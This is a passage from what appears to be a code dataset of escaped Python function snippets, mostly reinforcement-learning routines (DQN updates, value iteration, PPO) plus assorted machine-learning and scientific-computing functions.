itsone\n mew12 += x[i, 2] / itsone\n \n # variance of omega \n sigma00 = 0\n sigma01 = 0\n sigma02 = 0\n sigma10 = 0\n sigma11 = 0\n sigma12 = 0\n for i in range(len(y)):\n if y[i] == 0:\n sigma00 += (x[i, 0] - mew00)**2 / itszero\n sigma01 += (x[i, 1] - mew01)**2 / itszero\n sigma02 += (x[i, 2] - mew02)**2 / itszero\n else:\n sigma10 += (x[i, 0] - mew10)**2 / itsone\n sigma11 += (x[i, 1] - mew11)**2 / itsone\n sigma12 += (x[i, 2] - mew12)**2 / itsone\n \n # store these parameters into the name \"omage\"\n omega = [theta0, theta1, mew00, mew01, mew02, mew10, mew11, mew12,\n sigma00, sigma01, sigma02, sigma10, sigma11, sigma12] \n \n else: # Gaussian Mixture\n pass\n \n return omega", "def value_iteration(self):\n #Create a utility function of the environment shape\n gamma = 0.9\n epsilon = 0.01\n iteration = 0\n\n #create a utility function that matches the size of the number of states\n u = np.zeros(self.env.observation_space.n, dtype=float)\n\n u_copy = u.copy()\n\n #Create the reward grid\n reward = np.array([state_map.get(sublist) for state in frozen_lake.MAPS[self.env.spec._kwargs.get('map_name')] for sublist in state])\n\n T = self.frozen_transition()\n\n graph_list = list()\n\n #keep track of the convergence\n policy_convergence = list()\n\n while True:\n delta = 0\n iteration += 1\n u = u_copy.copy()\n graph_list.append(u)\n start_time = time()\n for s in range(self.env.observation_space.n):\n r = reward[s]\n v = np.zeros((1, self.env.observation_space.n), dtype=float)\n v[0, s] = 1.0\n u_copy[s] = self.return_state_utility(v, T, u, r, gamma)\n delta = max(delta, np.abs(u_copy[s] - u[s]))\n policy_convergence.append({'iter': iteration, 'delta': delta})\n if delta < epsilon * (1 - gamma) / gamma:\n print(\"Total Iterations: {}\".format(iteration))\n print(\"=================== VALUE ITERATION RESULT ==================\")\n print(\"Iterations: \" + str(iteration))\n print(\"Delta: \" + str(delta))\n print(\"Gamma: \" + str(gamma))\n print(\"Epsilon: \" + str(epsilon))\n print(\"Time to converge: {} seconds\".format(time() - start_time))\n print(\"===================================================\")\n utility_reshape = np.reshape(u, (int(np.sqrt(self.env.observation_space.n)), int(np.sqrt(self.env.observation_space.n))))\n print (np.array(utility_reshape, dtype=float))\n print(\"===================================================\")\n break\n\n return u", "def learn(self, experiences, gamma):\n states, actions, rewards, next_states, dones, weights, indexes = experiences\n\n q_expected, q_targets = self.get_target_and_expected(states, \n actions, \n rewards, \n next_states, \n dones, \n gamma)\n\n #print('q_expected.shape', q_expected.shape)\n #print('q_targets.shape', q_targets.shape)\n \n # Compute loss\n ##### deltas = F.mse_loss(q_expected, q_targets)\n deltas = q_expected - q_targets\n #print('loss.shape', loss.data.cpu().numpy().shape)\n #print('loss', loss)\n \n _sampling_weights = (torch.Tensor(weights)\n .view((-1, 1)))\n \n # mean square error\n loss = torch.mean((deltas * _sampling_weights)**2)\n\n # importance sampling weights used to correct bias introduced \n # by prioritisation experience replay\n # See Annealing the bias https://arxiv.org/abs/1511.05952\n #with torch.no_grad():\n # weight = sum(np.multiply(weights, loss.data.cpu().numpy()))\n # print('weight', weight)\n # loss *= weight\n # print('weights.shape', weights.shape)\n # print('loss type', type(loss))\n # print('loss shape', loss.size())\n # loss *= weights\n # Minimize the loss\n # call zero_grad before calling backward() \n # o.w. gradients are accumulated from multiple passes\n self.optimizer.zero_grad()\n # backward computes dloss/dx for every parameter x\n loss.backward()\n # updates parameters\n self.optimizer.step()\n\n # ------------------- update target network ------------------- #\n self.soft_update(self.qnetwork_local, self.qnetwork_target, TAU) \n \n # ------------------- update priorities ------------------- # \n priorities = abs(deltas.detach()).numpy()\n #priorities = abs(q_expected.detach() - q_targets.detach()).numpy()\n self.memory.update_priorities(priorities, indexes)", "def get_action(self,state):\n \n q_values = self.__network.predict(state[None])[0]\n \n ###YOUR CODE\n if np.random.rand()<self.epsilon:\n return np.random.choice(self.n_actions)\n return np.argmax(q_values)", "def q_values(self):\n # reshape input to 4d tensor [batch, height, width, channels]\n input = tf.reshape(self.state,\n [-1,\n Parameters.IMAGE_HEIGHT,\n Parameters.IMAGE_WIDTH,\n Parameters.AGENT_HISTORY_LENGTH])\n\n # convolutional layer 1\n \"\"\"\n [Article] The first hidden layer convolves 32 filters of 8 x 8 with stride 4 with the\n input image and applies a rectifier nonlinearity\n \"\"\"\n W_conv1 = self.weight_variable(\n [8, 8, Parameters.AGENT_HISTORY_LENGTH, 32])\n b_conv1 = self.bias_variable([32])\n conv1 = tf.nn.conv2d(\n input,\n W_conv1,\n strides=[1, 4, 4, 1],\n padding='VALID') # would 'SAME' also work ?\n h_conv1 = tf.nn.relu(conv1 + b_conv1)\n\n # output of conv 1 is of shape [-1 x 20 x 20 x 32]\n\n # convolutional layer 2\n \"\"\"\n [Article] The second hidden layer convolves 64 filters of 4 x 4 with stride 2,\n again followed by a rectifier nonlinearity\n \"\"\"\n W_conv2 = self.weight_variable([4, 4, 32, 64])\n b_conv2 = self.bias_variable([64])\n conv2 = tf.nn.conv2d(\n h_conv1, W_conv2, strides=[1, 2, 2, 1], padding='VALID')\n h_conv2 = tf.nn.relu(conv2 + b_conv2)\n\n # output of conv 2 is of shape [-1 x 9 x 9 x 64]\n\n # convolutional layer 3\n \"\"\"\n [Article] This is followed by a third convolutional layer that convolves\n 64 filters of 3 x 3 with stride 1 followed by a rectifier\n \"\"\"\n W_conv3 = self.weight_variable([3, 3, 64, 64])\n b_conv3 = self.bias_variable([64])\n conv3 = tf.nn.conv2d(\n h_conv2, W_conv3, strides=[1, 1, 1, 1], padding='VALID')\n h_conv3 = tf.nn.relu(conv3 + b_conv3)\n\n # output of conv 3 is of shape [-1 x 7 x 7 x 64]\n\n h_conv3_flat = tf.reshape(h_conv3, [-1, 7 * 7 * 64])\n\n # fully connected layer 1\n W_fc1 = self.weight_variable([7 * 7 * 64, 512])\n b_fc1 = self.bias_variable([512])\n fc1 = tf.matmul(h_conv3_flat, W_fc1)\n self.h_fc1 = h_fc1 = tf.nn.relu(fc1 + b_fc1)\n\n # fully connected layer 2 (output layer)\n W_fc2 = self.weight_variable([512, self.action_space])\n b_fc2 = self.bias_variable([self.action_space])\n fc2 = tf.matmul(h_fc1, W_fc2)\n\n # network output is of shape (1, self.action_space)\n \"\"\"\n [Article] We use an architecture in which there is a separate output unit\n for each possible action [ = one-hot encoding ], and only the state representation\n is an input to the neural network. The outputs correspond to the predicted Q-values of\n the individual actions for the input state.\n \"\"\"\n predicted_q_values = fc2 + b_fc2\n\n # saving learning parameters and layers output to access them directly\n # if needed\n\n self.learning_parameters[\"W_conv1\"], self.learning_parameters[\"b_conv1\"] = W_conv1, b_conv1\n self.layers[\"conv1\"], self.layers[\"h_conv1\"] = conv1, h_conv1\n\n self.learning_parameters[\"W_conv2\"], self.learning_parameters[\"b_conv2\"] = W_conv2, b_conv2\n self.layers[\"conv2\"], self.layers[\"h_conv2\"] = conv2, h_conv2\n\n self.learning_parameters[\"W_conv3\"], self.learning_parameters[\"b_conv3\"] = W_conv3, b_conv3\n self.layers[\"conv3\"], self.layers[\"h_conv3\"], self.layers[\"h_conv3_flat\"] = conv3, h_conv3, h_conv3_flat\n\n self.learning_parameters[\"W_fc1\"], self.learning_parameters[\"b_fc1\"] = W_fc1, b_fc1\n self.layers[\"fc1\"], self.layers[\"h_fc1\"] = fc1, h_fc1\n\n self.learning_parameters[\"W_fc2\"], self.learning_parameters[\"b_fc2\"] = W_fc2, b_fc2\n self.layers[\"fc2\"], self.layers[\"h_fc2\"] = fc2, predicted_q_values\n\n return(predicted_q_values)", "def get_learning_rate():\n return 0.00001", "def call(self, states):\n # TODO: implement this ~\n l1 = tf.nn.relu(self.Q_1(states))\n l2 = tf.nn.relu(self.Q_2(l1))\n qVals = self.Q_3(l2)\n return qVals\n # return tf.argmax(qVals, 1)", "def getPredictions(self):\n\t\tself.bestLabel = self.testingProbs.apply(lambda x: x.argmax(),1)", "def learn(self):\n \n # target parameter update\n # target parameter update\n if self.learn_step_counter % self.nu_iter == 0:\n self.target_net.load_state_dict(self.eval_net.state_dict())\n #testing the preformace of the network\n if self.learn_step_counter == 0:\n print('As referece this first test on dev data. Is maded with the Q networks, initialized randomly : ' )\n else:\n print(\"\\n Lets copy the Q-value Net in to Q-target net!. And test the performace on the dev data: \")\n \n current_bleu = self.dev_network()\n print(\"Current Bleu score is: \", current_bleu)\n \n self.learn_step_counter += 1\n\n \n long_Batch = self.sample_size*3\n # Sampling the higgest rewards values\n b_memory_big = self.memory[np.argsort(-self.memory[:-self.max_output_length, self.state_size+1])][:long_Batch]\n \n sample_index = np.random.choice(long_Batch, self.sample_size)\n b_memory = b_memory_big[sample_index, :]\n\n b_s = torch.FloatTensor(b_memory[:, :self.state_size])\n b_a = torch.LongTensor(b_memory[:, self.state_size:self.state_size+1].astype(int))\n b_r = torch.FloatTensor(b_memory[:, self.state_size+1:self.state_size+2])\n b_s_ = torch.FloatTensor(b_memory[:, self.state_size+2: self.state_size+2 + self.state_size])\n\n b_is_eos = torch.FloatTensor(b_memory[:, self.size_memory1-1:]).view(self.sample_size, 1)\n #print(b_a, b_a.size)\n #print(b_is_eos)\n #Activate the eval_net\n unfreeze_model(self.eval_net)\n \n # q_eval w.r.t the action in experience\n q_eval = self.eval_net(b_s).gather(1, b_a) # shape (batch, 1)\n q_next = self.target_net(b_s_).detach() # detach from graph, don't backpropagate\n #taking the most likely action.\n b_a_ = torch.LongTensor(q_next.max(1)[1].view(self.sample_size, 1).long())\n #b_a_ = q_next.max(1)[0].view(self.sample_size, 1).long() # shape (batch, 1)\n q_eval_next = self.eval_net(b_s_).gather(1, b_a_) # shape (batch, 1)\n \n #If eos q_target = reward. \n q_target = b_r + self.gamma * b_is_eos* q_eval_next.view(self.sample_size, 1) # shape (batch, 1)\n #version 0\n #q_target = b_r + self.gamma * q_next.max(1)[0].view(self.sample_size, 1) # shape (batch, 1)\n \n loss = self.loss_func(q_eval, q_target)\n \n self.tb_writer.add_scalar(\"learn/learn_batch_loss\",\n loss.data, self.learn_step_counter)\n\n self.optimizer.zero_grad()\n loss.backward()\n self.optimizer.step()\n\n #desctivate the eval_net\n freeze_model(self.eval_net)", "def _model(self, scope):\n\n with tf.variable_scope(scope):\n\n act = tf.nn.elu\n initializer = tfcl.variance_scaling_initializer()\n xs = tf.layers.dense(self.state, 400, act, kernel_initializer=initializer)\n xs = tf.layers.dense(xs, 300, None, kernel_initializer=initializer)\n\n xa = tf.layers.dense(self._action, 400, act, kernel_initializer=initializer)\n xa = tf.layers.dense(xa, 300, None, kernel_initializer=initializer)\n\n x = tf.nn.elu(xa + xs)\n\n q_value = tf.layers.dense(x, 1, None, kernel_initializer=initializer)\n\n return q_value", "def est_return(self, r, mask):\n batchsz = r.size(0)\n\n # v_target is worked out by Bellman equation.\n v_target = torch.Tensor(batchsz).to(device=DEVICE)\n\n prev_v_target = 0\n for t in reversed(range(batchsz)):\n # mask here indicates a end of trajectory\n # this value will be treated as the target value of value network.\n # mask = 0 means the immediate reward is the real V(s) since it's end of trajectory.\n # formula: V(s_t) = r_t + gamma * V(s_t+1)\n v_target[t] = r[t] + self.gamma * prev_v_target * mask[t]\n # update previous\n prev_v_target = v_target[t]\n\n return v_target", "def calc_q_values(self, state): \n q_vals = self.q_network.predict(np.swapaxes(state,0,3))\n return q_vals", "def calculate_q_targets(q1_batch, q2_batch, r_batch, nonterminal_batch, gamma=.99):\r\n\r\n actions = torch.argmax(q1_batch, dim=1)\r\n\r\n max_q2 = q2_batch[torch.arange(q2_batch.size(0)), actions]\r\n\r\n Y = r_batch + gamma * max_q2\r\n\r\n Y[~nonterminal_batch] = r_batch[~nonterminal_batch]\r\n\r\n return Y", "def train(self, iterations: int):\n\n s = \"{:3d} reward {:6.2f}/{:6.2f}/{:6.2f} len {:6.2f} epsilon {:1.3f} {}\"\n s_check = \"{:3d} reward {:6.2f}/{:6.2f}/{:6.2f} len {:6.2f} epsilon {:1.3f} saved {} \"\n total_steps = 0\n iter_metrics = []\n for n in range(iterations):\n r_min, r_mean, r_max, iter_steps = self.train_iter()\n iter_metrics.append((r_min, r_mean, r_max))\n total_steps += iter_steps\n\n if n == int(iterations / 2):\n self.steps_to_update_target_model = int(self.steps_to_update_target_model / 2)\n\n # checkpointing & logging\n s_print = s\n file_name = \"\"\n if n % self.checkpoint_freq == 0:\n file_name = f'my_dqn_{n}.pth'\n torch.save(self.target_dqn.state_dict(), os.path.join(self.checkpoint_path, file_name))\n s_print = s_check\n\n if self.verbose:\n print(s_print.format(\n n + 1,\n r_min,\n r_mean,\n r_max,\n total_steps,\n self.e_greedy,\n file_name\n ))\n iter_min = np.mean([x[0] for x in iter_metrics])\n iter_mean = np.mean([x[1] for x in iter_metrics])\n iter_max = np.mean([x[2] for x in iter_metrics])\n return iter_min, iter_mean, iter_max", "def learn(self):\n if self.learn_step_counter % self.target_q_update_step == 0:\n self.target_net.load_state_dict(self.eval_net.state_dict()) #update target_net's parameters\n logging.info(\"updtate target q\")\n self.learn_step_counter += 1\n\n rgbs,depths, rgbs_1, depths_1,questions,actions,rewards,terminals = self.memory.sample()\n\n rgbs_var = Variable(torch.FloatTensor(rgbs).cuda())\n depths_var = Variable(torch.FloatTensor(depths).cuda())\n rgbs_1_var = Variable(torch.FloatTensor(rgbs_1).cuda())\n depths_1_var = Variable(torch.FloatTensor(depths_1).cuda())\n questions_var = Variable(torch.LongTensor(questions).cuda())\n actions_var = Variable(torch.LongTensor(actions).cuda())\n rewards_var = Variable(torch.FloatTensor(rewards).cuda())\n terminals_var = Variable(torch.FloatTensor(terminals).cuda())\n\n q_eval_matrix = self.eval_net(rgbs_var,depths_var,questions_var)\n q_eval_matrix = q_eval_matrix.view(-1,9*28*28)\n actions_var = actions_var.view(-1,1)\n q_eval = torch.gather(q_eval_matrix, 1, actions_var) \n q_eval = q_eval.squeeze(1)\n\n q_next_matrix = self.target_net(rgbs_1_var,depths_1_var,questions_var).detach() #don't backward\n q_next_matrix = q_next_matrix.view(-1,9*28*28)\n q_next = torch.max(q_next_matrix,1)[0]\n\n one_var = Variable(torch.ones_like(terminals_var))\n\n q_target = rewards_var + (one_var- terminals_var)*self.discount * q_next\n \n loss = self.loss_func(q_eval, q_target)\n\n\n self.optimizer.zero_grad()\n loss.backward()\n self.optimizer.step()\n\n self.task_total_loss += loss.item()\n self.task_total_q += q_target.mean()\n self.update_count += 1", "def __init__(self, input, n_out, y):\n n_in = input.get_shape()[1].value\n self.input = input\n\n # Initiate the weight and biases for this layer\n r = 4*np.sqrt(6.0/(n_in + n_out))\n w = tf.Variable(tf.random_uniform([n_in, n_out], minval=-r, maxval=r))\n b = tf.Variable(tf.zeros([n_out]), name='b')\n\n pred = tf.add(tf.matmul(input, w), b)\n ################\n temp = tf.nn.softmax(pred)\n\n cost = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(pred, y))\n\n # Evaluate model\n correct_pred = tf.equal(tf.argmax(pred, 1), tf.argmax(y, 1))\n self.accuracy = tf.reduce_mean(tf.cast(correct_pred, tf.float32))\n \n self.y = y\n self.w = w\n self.b = b\n self.cost = cost\n ###############\n self.temp = temp\n self.params= [w]", "def learn(self, experiences, gamma):\n states, actions, rewards, next_states, dones = experiences\n\n # Get max predicted Q values (for next states) from target model\n Q_targets_next = self.qnetwork_target(\n next_states).detach().max(1)[0].unsqueeze(1)\n \n # Compute Q targets for current states \n Q_targets = rewards + (gamma * Q_targets_next * (1 - dones))\n\n # Get expected Q values from local model\n Q_expected = self.qnetwork_local(states).gather(1, actions)\n\n # Compute loss\n loss = F.mse_loss(Q_expected, Q_targets)\n\n # Minimize the loss\n self.optimizer.zero_grad()\n loss.backward()\n self.optimizer.step()\n\n # ------------------- update target network ------------------- #\n self.soft_update(self.qnetwork_local, self.qnetwork_target, self.tau) \n\n return", "def fun(_, y):\n return np.array([-self.r * self.beta * y[1] * y[0] / self.N,\n self.r * self.beta * y[1] * y[0] / self.N - self.gamma * y[1],\n self.gamma * y[1]])", "def _preprocess_experience(self):\n observed_inputs = []\n observed_reward = []\n predicted_outputs = []\n distance_from_reward = []\n next_state = []\n # process inputs and outputs to train the net\n for episode in self.examples:\n episode_match, example_reward = episode\n last_step = True\n for n, step in enumerate(reversed(episode_match)):\n this_state = state_from_hash(step.state_t)\n next_state.append(state_from_hash(step.action_t))\n observed_inputs.append(np.hstack((this_state,\n this_state != next_state[-1]))\n .flatten())\n distance_from_reward.append(n)\n # now we have to evaluate max_{s'}[Q(a',s')]\n # let's see all possible actions two steps ahead\n two_ahead = []\n for possible_action in self.state_space[step.action_t].actions:\n possible_action = state_from_hash(possible_action)\n two_ahead.append(np.hstack((next_state[-1],\n next_state[-1] != possible_action))\n .flatten())\n if not two_ahead:\n # if it's a terminal state, no two-ahead, so set the max to 0\n max_next_state = 0\n else:\n # evaluate Q on the two-ahead actions\n two_ahead = np.array(two_ahead)\n two_ahead[two_ahead == 2] = -1\n max_next_state = self.sess.run(\n self.output,\n feed_dict={self.input: two_ahead}).flatten()\n\n # calc the maximum\n max_next_state = np.max(max_next_state)\n predicted_outputs.append(max_next_state)\n if last_step:\n # because we start from last step, `last_step` will be true\n observed_reward.append(example_reward)\n # then set it to false so non-last steps get reward 0\n last_step = False\n else:\n observed_reward.append(0)\n # Q-network output from the inputs\n predicted_outputs = self.discount * np.vstack(predicted_outputs).flatten()\n observed_inputs = np.array(observed_inputs)\n # possible max value in a state is 2, set all 2's to -1's\n observed_inputs[observed_inputs == 2] = -1\n observed_reward = np.vstack(observed_reward).flatten()\n return observed_inputs, observed_reward, predicted_outputs, distance_from_reward", "def calculate_gamma(self):\n result = self.result\n # scaler = preprocessing.StandardScaler()\n # train_minmax = scaler.fit_transform(result)\n # st_rho, st_delta = train_minmax[:, 0], train_minmax[:, 1]\n # self.gamma = (st_delta + st_rho) / 2\n self.gamma = result[:, 0] * result[:, 1]\n self.gamma_des_index = np.argsort(-self.gamma)", "def gamma(self, predictor):\n pred = predictor(self.X)\n self.tags[_PREDICTION] = pred\n expect_event = self.tags.groupby(_EVENT).mean()\n expect_group_event = self.tags.groupby(\n [_EVENT, _GROUP_ID]).mean()\n\n num_grp = len(self.error_rate)\n tprs = [0 for _ in range(num_grp)]\n # print(expect_group_event)\n for i in range(num_grp):\n tprs[i] = expect_group_event.loc[(expect_group_event.index.get_level_values(_GROUP_ID) == i)].groupby([_EVENT]).mean()\n expect_group_event.loc[('label=1', i), 'pred'] = (1 - self.error_rate[i][0]) * tprs[i].loc['label=1', 'pred'] + self.error_rate[i][0] * tprs[i].loc['label=0', 'pred']\n expect_group_event.loc[('label=0', i), 'pred'] = (1 - self.error_rate[i][1]) * tprs[i].loc['label=0', 'pred'] + self.error_rate[i][1] * tprs[i].loc['label=1', 'pred']\n\n # neg = expect_group_event.loc[(expect_group_event.index.get_level_values(_GROUP_ID) == 0.0)].groupby([_EVENT]).mean()\n # pos = expect_group_event.loc[(expect_group_event.index.get_level_values(_GROUP_ID) == 1.0)].groupby([_EVENT]).mean()\n\n # expect_group_event.loc[('label=1.0', 1), 'pred'] = (1 - self.error_rate[1][0]) * pos.loc['label=1.0', 'pred'] + self.error_rate[1][1] * pos.loc['label=0.0', 'pred']\n # expect_group_event.loc[('label=0.0', 1), 'pred'] = (1 - self.error_rate[1][1]) * pos.loc['label=0.0', 'pred'] + self.error_rate[1][0] * pos.loc['label=1.0', 'pred']\n\n # expect_group_event.loc[('label=1.0', 0), 'pred'] = (1 - self.error_rate[0][0]) * neg.loc['label=1.0', 'pred'] + self.error_rate[0][1] * neg.loc['label=0.0', 'pred']\n # expect_group_event.loc[('label=0.0', 0), 'pred'] = (1 - self.error_rate[0][1]) * neg.loc['label=0.0', 'pred'] + self.error_rate[0][0] * neg.loc['label=1.0', 'pred']\n\n expect_event = expect_group_event.groupby(_EVENT).mean()\n expect_group_event[_DIFF] = expect_group_event[_PREDICTION] - expect_event[_PREDICTION]\n\n # expect_group_event[_DIFF] = expect_group_event[_PREDICTION] - expect_event[_PREDICTION]\n g_unsigned = expect_group_event[_DIFF]\n g_signed = pd.concat([g_unsigned, -g_unsigned],\n keys=[\"+\", \"-\"],\n names=[_SIGN, _EVENT, _GROUP_ID])\n self._gamma_descr = str(expect_group_event[[_PREDICTION, _DIFF]])\n return g_signed", "def predict(self, state):\n inputs = state.reshape((1, ) + state.shape)\n action = np.zeros((1, 1)).astype(int)\n target_q = np.zeros((1, self.atoms))\n out = self.actor.predict([inputs, action, target_q])\n out = np.sum(out[0] * self.z_lin, 1)\n # print(Q.shape)\n return np.argmax(out)", "def RatingsGradientDescent(params, Y, R, num_users, num_movies, num_features, lbd, alpha, num_iters):\n J_history = np.zeros(num_iters)\n for i in range(num_iters):\n J_history[i], grad = cofiCostFunc(params, Y, R, num_users, num_movies, num_features, lbd)\n params = params-alpha*grad\n if i % 100 == 99:\n print('Step %i, cost=%f' % (i+1, J_history[i]))\n return params, J_history", "def step(self, x, y, learning_rate=1e-3):\n \n # Input transformation\n \"\"\"\n Input is represented with M-dimensional vectors\n We convert them to (N, M) matrices such that columns are one-hot \n representations of the input\n \"\"\"\n x = self.one_hot(x, self.N)\n y = self.one_hot(y, self.N)\n\n \n # Forward propagation\n \"\"\"\n Returns\n -------\n embedding: array\n (D, M) matrix where columns are word embedding from U matrix\n logits: array\n (N, M) matrix where columns are output logits\n prob: array\n (N, M) matrix where columns are output probabilities\n \"\"\"\n \n ### YOUR CODE HERE ###\n #Omran:\n #U and V of dimension (D, N) and (N, D) respectively\n\n embedding = np.dot(self.U, x)\n logits = np.dot(self.V, embedding)\n prob = self.softmax(logits,0)# take care of the axis, I am not quite sure how you will implement it\n \n assert embedding.shape == (self.D, x.shape[1])\n assert logits.shape == (self.N, x.shape[1])\n assert prob.shape == (self.N, x.shape[1])\n \n \n # Loss calculation\n \"\"\"\n Returns\n -------\n loss: int\n Cross-entropy loss using true values and probabilities\n \"\"\"\n \n ### YOUR CODE HERE ###\n loss = self.loss(y, prob)\n \n # Backward propagation\n \"\"\"\n Returns\n -------\n d_U: array\n (N, D) matrix of partial derivatives of loss w.r.t. U\n d_V: array\n (D, N) matrix of partial derivatives of loss w.r.t. V\n \"\"\"\n \n ### YOUR CODE HERE ###\n #I am not quite sure of this!!\n \n# difference = np.sum(np.subtract(prob, y), axis=1)\n difference = prob - y\n d_V = difference @ embedding.T\n# print(self.N, self.D)\n# print(difference.shape)\n# print(d_V.shape)\n d_U = (self.V.T @ difference) @ x.T\n# d_U = self.V.T @ np.outer(difference, x)\n \n assert d_V.shape == (self.N, self.D)\n assert d_U.shape == (self.D, self.N)\n \n \n # Update the parameters\n \"\"\"\n Updates the weights with gradient descent such that W_new = W - alpha * dL/dW, \n where alpha is the learning rate and dL/dW is the partial derivative of loss w.r.t. \n the weights W\n \"\"\"\n \n ### YOUR CODE HERE ###\n self.V = self.V - learning_rate * d_V\n self.U = self.U - learning_rate * d_U\n\n return loss, d_U, d_V", "def update_policy(self, minibatch_size):\n \n steps = self.rewards.shape[0]\n batch_size = self.rewards.shape[0] * self.rewards.shape[1]\n #steps = 500\n #batch_size = 500\n #print(steps)\n #print(batch_size)\n \n # Compute advantages\n '''\n with torch.no_grad():\n if self.gae:\n advantages = torch.zeros_like(self.rewards).to(self.training_device)\n lastgaelam = 0\n for t in reversed(range(steps)):\n if t == steps - 1:\n nextnonterminal = 1.0 - self.dones[t]\n nextvalues = self.state_values[t]\n else:\n nextnonterminal = 1.0 - self.dones[t + 1]\n nextvalues = self.state_values[t + 1]\n delta = self.rewards[t] + self.gamma * nextvalues * nextnonterminal - self.state_values[t]\n advantages[t] = lastgaelam = delta + self.gamma * self.gae_lambda * nextnonterminal * lastgaelam\n returns = advantages + self.state_values\n else:\n returns = torch.zeros_like(self.rewards).to(self.training_device)\n for t in reversed(range(steps)):\n if t == steps - 1:\n nextnonterminal = 1.0 - self.dones[t]\n next_return = self.state_values[t]\n else:\n nextnonterminal = 1.0 - self.dones[t+1]\n next_return = returns[t+1]\n returns[t] = self.rewards[t] + self.gamma * nextnonterminal * next_return\n advantages = returns - self.state_values\n ''' \n returns = torch.zeros_like(self.rewards).to(self.training_device)\n for t in reversed(range(steps)):\n if t == steps - 1:\n nextnonterminal = 1.0 - self.dones[t]\n next_return = self.state_values[t]\n else:\n nextnonterminal = 1.0 - self.dones[t+1]\n next_return = returns[t+1]\n returns[t] = self.rewards[t] + self.gamma * nextnonterminal * next_return\n advantages = returns - self.state_values\n \n\n # flatten the batch\n #b_obs = self.states.reshape((-1,) + self.state_space)\n #print(self.states.shape)\n b_obs = self.states.reshape((-1,4)).detach()\n b_logprobs = self.action_probs.reshape(-1,1).detach()\n b_actions = self.actions.reshape((-1,)).detach()\n b_advantages = advantages.reshape(-1,1)\n b_returns = returns.reshape(-1,1)\n b_values = self.state_values.reshape(-1,1)\n \n # Optimize policy and value network for K epochs, run optimization in minibatches\n \n inds = np.arange(batch_size)\n for i_epoch_pi in range(self.epochs):\n np.random.shuffle(inds)\n for start in range(0, batch_size, minibatch_size):\n end = start + minibatch_size\n minibatch_ind = inds[start:end]\n mb_advantages = b_advantages[minibatch_ind]\n if self.norm_adv:\n mb_advantages = (mb_advantages - mb_advantages.mean()) / (mb_advantages.std() + 1e-8)\n \n #_, newlogproba, entropy = self.get_action(b_obs[minibatch_ind], b_actions[minibatch_ind])\n newlogproba, entropy = self.evaluate(b_obs[minibatch_ind], b_actions[minibatch_ind])\n #ratio = (newlogproba - b_logprobs[minibatch_ind]).exp()\n ratio = torch.exp((newlogproba - b_logprobs[minibatch_ind].detach()))\n \n # Stats\n approx_kl = (b_logprobs[minibatch_ind] - newlogproba).mean()\n\n # Policy loss\n pg_loss1 = -mb_advantages * ratio\n pg_loss2 = -mb_advantages * torch.clamp(ratio, 1 - self.clip_epsilon, 1 + self.clip_epsilon)\n pg_loss = torch.max(pg_loss1, pg_loss2).mean()\n entropy_loss = entropy.mean()\n\n # Value loss\n _, new_values = self.policy.forward(b_obs[minibatch_ind])\n if self.clip_vloss:\n \n v_loss_unclipped = self.MseLoss(new_values,b_returns[minibatch_ind])\n #v_loss_unclipped = ((new_values - b_returns[minibatch_ind]) ** 2)\n v_clipped = b_values[minibatch_ind] + torch.clamp(new_values - b_values[minibatch_ind],\n -self.clip_epsilon, self.clip_epsilon)\n #v_loss_clipped = (v_clipped - b_returns[minibatch_ind]) ** 2\n v_loss_clipped = self.MseLoss(v_clipped,b_returns[minibatch_ind])\n v_loss_max = torch.max(v_loss_unclipped, v_loss_clipped)\n #v_loss = 0.5 * v_loss_max.mean()\n v_loss = 0.5 * v_loss_max\n else:\n #v_loss = 0.5 * ((new_values - b_returns[minibatch_ind]) ** 2).mean()\n v_loss = self.MseLoss(new_values,b_returns[minibatch_ind])\n\n loss = pg_loss + v_loss * self.vf_coeff - self.ent_coeff * entropy_loss\n\n self.optimizer.zero_grad()\n loss.backward()\n torch.nn.utils.clip_grad_norm_(self.policy.parameters(), self.max_grad_norm)\n self.optimizer.step()\n # Copy new weights into old policy:\n self.old_policy.load_state_dict(self.policy.state_dict())", "def setConstQuantityAndBetaEqState(self, pointDict, quantity, target):\n print \"setConstQuantityAndBetaEqState: \", pointDict\n assert 'ye' not in pointDict, \"You can't SPECIFY a Ye if you're \" \\\n \"setting neutrinoless beta equlibrium!\"\n self.validatePointDict(pointDict)\n assert len(pointDict) < 2, \"State overdetermined for more than 1 indVars!\"\n #todo: check quantity is valid 3D table\n\n #defines 1D root solver to use in routine\n solveRoot = scipyOptimize.brentq # solveRootBisect\n\n solveVarName = 'logtemp'\n currentSolveVar = 0.0\n currentYe = 0.25\n #previous variables used to measure convergence of solve\n # so set them to something significantly different than starting values\n previousSolveVar = 100.0\n previousYe = 100.0\n yeError = relativeError(currentYe, previousYe)\n solveVarError = relativeError(currentSolveVar, previousSolveVar)\n otherVarName = pointDict.keys()[0]\n otherVar = pointDict.values()[0]\n\n maxIters = 5\n tol = 1e-3\n\n iteration = 0\n while iteration < maxIters and yeError + solveVarError > tol/2.0:\n previousSolveVar = currentSolveVar\n previousYe = currentYe\n getSolveVar = lambda x: multidimInterp((currentYe, x, otherVar),\n [self.h5file['ye'][:],\n self.h5file[solveVarName],\n self.h5file[otherVarName]],\n self.h5file[quantity][...],\n linInterp, 2) - target\n try:\n currentSolveVar = solveRoot(getSolveVar,\n self.h5file[solveVarName][0],\n self.h5file[solveVarName][-1],\n (),tol)\n except ValueError as err:\n print \"Root for log10(T) not bracketed on entire table: \" \\\n + str(err)\n # see if lower or upper temperature bound best\n logtemp = self.h5file['logtemp']\n answer1 = multidimInterp((currentYe, logtemp[0], otherVar),\n [self.h5file['ye'][:],\n self.h5file['logtemp'],\n self.h5file['logrho']],\n self.h5file[quantity][...],\n linInterp, 2) - target\n answer2 = multidimInterp((currentYe, logtemp[-1], otherVar),\n [self.h5file['ye'][:],\n self.h5file['logtemp'],\n self.h5file['logrho']],\n self.h5file[quantity][...],\n linInterp, 2) - target\n\n if (abs(answer1) < abs(answer2)):\n currentSolveVar = self.h5file['logtemp'][0]\n print \"Recovering with lowest table value, answer: %s\" % currentSolveVar\n else:\n currentSolveVar = self.h5file['logtemp'][-1]\n print \"Recovering with highest value, answer: %s\" % currentSolveVar\n\n getYe = lambda x : multidimInterp((x, currentSolveVar, otherVar),\n [self.h5file['ye'][:],\n self.h5file[solveVarName],\n self.h5file[otherVarName]],\n self.h5file['munu'][...],\n linInterp, 2)\n #check for bracketing error in root solve for ye\n try:\n currentYe = solveRoot(getYe,\n self.h5file['ye'][0],\n self.h5file['ye'][-1], (), tol)\n except ValueError as err:\n print \"Error in scipy root solver solving for ye: \", str(err)\n currentYe = self.findYeOfMinAbsMunu((currentSolveVar, otherVar))\n print 